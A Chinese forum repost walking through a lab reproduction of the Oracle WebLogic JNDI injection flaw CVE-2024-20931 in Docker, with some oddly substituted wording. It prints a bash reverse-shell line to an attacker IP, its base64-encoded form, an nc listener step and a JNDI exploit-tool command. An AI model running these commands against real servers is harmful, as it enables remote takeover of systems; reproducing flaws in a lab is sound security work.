花瓣小跑 发表于 2024-5-15 00:54:52

Oracle WebLogic Server JNDI注入毛病(CVE-2024-20931)复现

先从镜像站拉取Oracle WebLogic Server JNDI注入毛病(CVE-2024-20931)
                                然后在docker中启动这个镜像
                                即可在网页中访问,搭建网站成功
                                使用利用工具来进行验证是否存在毛病
                                获取DNS查看是否有回显
                                有回显毛病存在
                                创造反弹shell,先查看攻击机的ip
                                进行反弹shell编码
                                使用nc开启监听端口
                                接下来,运行JNDI注入工具:
                                再在工具中输入LDAP地址
                                查看nc是否回去shell
                                获取成功复现成功
先从镜像站拉取Oracle WebLogic Server JNDI注入毛病(CVE-2024-20931)

docker pull ismaleiva90/weblogic12
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322091644362-1529192027.png
然后在docker中启动这个镜像

docker run -dit -p 7001:7001 -p 7002:7002 --restart=always ismaleiva90/weblogic12:latest
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322091644228-1299232158.png
即可在网页中访问,搭建网站成功

https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322091644280-978033497.png
使用利用工具来进行验证是否存在毛病

获取DNS查看是否有回显

https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322091644053-901517436.png
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322091643982-13631554.png
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322091644115-1851194160.png
有回显毛病存在

创造反弹shell,先查看攻击机的ip

https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322091643876-1467431662.png
bash -i >& /dev/tcp/192.168.162.1/5557 0>&1
进行反弹shell编码

https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322091644039-118008150.png
bash -c {echo,CmJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xNjIuMS81NTU3IDA+JjE=}|{base64,-d}|{bash,-i}
使用nc开启监听端口

https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322091643844-871654154.png
接下来,运行JNDI注入工具:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "编码后的反弹Shell下令" -A "启动恶意服务的服务器IP"
https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322091644317-1821244972.png
再在工具中输入LDAP地址

https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322091643921-733100425.png
查看nc是否回去shell

https://img2024.cnblogs.com/blog/3403234/202403/3403234-20240322091644116-1010821328.png
获取成功复现成功


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: Oracle WebLogic Server JNDI注入毛病(CVE-2024-20931)复现